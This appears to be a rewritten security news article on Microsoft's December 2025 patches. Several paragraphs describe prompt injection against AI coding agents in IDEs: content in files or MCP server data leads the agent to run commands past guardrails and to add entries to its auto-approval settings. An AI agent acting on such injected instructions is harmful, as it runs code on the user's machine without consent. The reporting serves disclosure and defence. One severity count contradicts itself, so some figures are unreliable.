Microsoft ended 2025 by releasing patches for 56 security flaws in various products across the Windows platform. This includes one vulnerability that is being exploited in the wild.
Of the 56 deficiencies, 3 were rated critical and 53 were rated critical. Two other flaws are listed as publicly known at the time of release. These include 29 privilege escalation, 18 remote code execution, 4 information disclosure, 3 denial of service, and 2 spoofing vulnerabilities.
According to data compiled by Fortra, Microsoft addressed a total of 1,275 CVEs in 2025. Tenable’s Sanam Narang said 2025 is also the second year in a row that Windows manufacturers have patched more than 1,000 CVEs. This is the third time this has happened since the inception of Patch Tuesday.
This update is in addition to 17 flaws that the tech giant has patched in its Chromium-based Edge browser since the release of the November 2025 Patch Tuesday update. This also includes the Edge for iOS spoofing vulnerability (CVE-2025-62223, CVSS score: 4.3).
The actively exploited vulnerability is CVE-2025-62221 (CVSS score: 7.8), which allows an authorized attacker to locally escalate privileges and gain SYSTEM privileges through use-after-free in the Windows Cloud Files Mini Filter driver.
“File system filter drivers, also known as minifilters, plug into the system software stack and intercept requests intended for the file system, extending or replacing the functionality provided by the original target,” Adam Barnett, lead software engineer at Rapid7, said in a statement. “Common use cases include data encryption, automated backups, on-the-fly compression, and cloud storage.”
“The Cloud Files mini-filter is used by OneDrive, Google Drive, iCloud, and more, but as a core component of Windows, it’s still present on systems that don’t have any of these apps installed.”
It is currently unknown how and under what circumstances this vulnerability could be exploited in the wild, but successful exploitation would require an attacker to gain access to a susceptible system through other means. Microsoft Threat Intelligence Center (MSTIC) and Microsoft Security Response Center (MSRC) are credited with discovering and reporting this flaw.
According to Mike Walters, president and co-founder of Action1, attackers can gain low-privileged access through methods such as phishing, web browser exploits, or another known remote code execution flaw and chain with CVE-2025-62221 to take control of a host.
This access could be used by an attacker to deploy kernel components, exploit signed drivers to evade defenses and maintain persistence, or be weaponized to achieve domain-wide compromise when combined with credential theft scenarios.
The exploitation of CVE-2025-62221 led the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add it to the Known Exploited Vulnerabilities (KEV) Catalog and require Federal Civilian Executive Branch (FCEB) agencies to patch it by December 30, 2025.
The remaining two zero-days are:
CVE-2025-54100 (CVSS Score: 7.8) – Command injection vulnerability in Windows PowerShell allows an unprivileged attacker to execute code locally. CVE-2025-64671 (CVSS score: 8.4) – Command injection vulnerability in GitHub Copilot for JetBrains allows an unprivileged attacker to execute code locally.
Alex Vovk of Action1 says of CVE-2025-54100, “This is a command injection flaw in the way Windows PowerShell handles web content.” “This allows an unauthenticated attacker to execute arbitrary code in the security context of a user who executes a crafted PowerShell command, such as Invoke-WebRequest.”
“This threat becomes significant when this vulnerability is combined with common attack patterns. For example, an attacker could use social engineering to convince a user or administrator to use Invoke-WebRequest to run a PowerShell snippet. This could allow a remote server to trigger a parsing flaw and return crafted content that leads to code execution and implant deployment.”
It is worth noting that CVE-2025-64671 is a result of widespread security vulnerabilities, collectively known as IDEsaster, recently disclosed by security researcher Ari Marzouk. This issue occurs as a result of adding agent functionality to an integrated development environment (IDE), exposing new security risks in the process.
These attacks leverage prompt injection into artificial intelligence (AI) agents embedded in the IDE and combine them with the base IDE layer to cause information disclosure and command execution.
“This is not part of IDEsaster’s new attack chain as it uses the ‘old’ attack chain of using a vulnerable tool,” Marzouk, who is credited with discovering and reporting the flaw, told The Hacker News. “Specifically, it is a vulnerable ‘command execution’ tool that can bypass user-configured allow lists. ”
Marzouk also said that multiple IDEs were found to be vulnerable to the same attack, including Kiro.dev, Cursor (CVE-2025-54131), JetBrains Junie (CVE-2025-59458), Gemini CLI, Windsurf, and Roo Code (CVE-2025-54377, CVE-2025-57771). CVE-2025-65946). Additionally, a similar vulnerability was discovered in GitHub Copilot for VS Code.
“This vulnerability indicates that it is possible to potentially execute code on an affected host by tricking LLM into executing commands that circumvent guardrails and adding instructions to a user’s ‘auto-approval’ settings,” said Kev Breen, senior director of cyber threat research at Immersive.
“This can be accomplished through ‘cross-prompt injection,’ in which the LLM agent, rather than the user, modifies the prompt by creating its own prompt based on the contents of files or data retrieved from Model Context Protocol (MCP) servers, which are becoming increasingly popular in agent-based LLMs.”
Software patches from other vendors
Over the past few weeks, in addition to Microsoft, other vendors have released security updates that fix multiple vulnerabilities, including:
Adobe Amazon Web Services AMD Arm ASUS Atlassian Bosch Broadcom (includes VMware) Canon Cisco Citrix CODESYS Dell Devolutions Drupal F5 Fortinet Fortra GitLab Google Android and Pixel Google Chrome Google Cloud Google Pixel Watch Hitachi Energy HP HP Enterprise (includes Aruba Networking and Juniper Networks) IBM Imagination Technologies Intel Ivanti Lenovo Linux Distributions AlmaLinux, Alpine Linux, Amazon Linux, Arch Linux, Debian, Gentoo, Oracle Linux, Mageia, Red Hat, Rocky Linux, SUSE, and Ubuntu MediaTek Mitsubishi Electric MongoDB Moxa Mozilla Firefox and Firefox ESR NVIDIA OPPO Progress Software Qualcomm React Rockwell Automation Samsung SAP Schneider Electric Siemens SolarWinds Splunk Synology TP-Link WatchGuard Zoom, and Zyxel
Source link
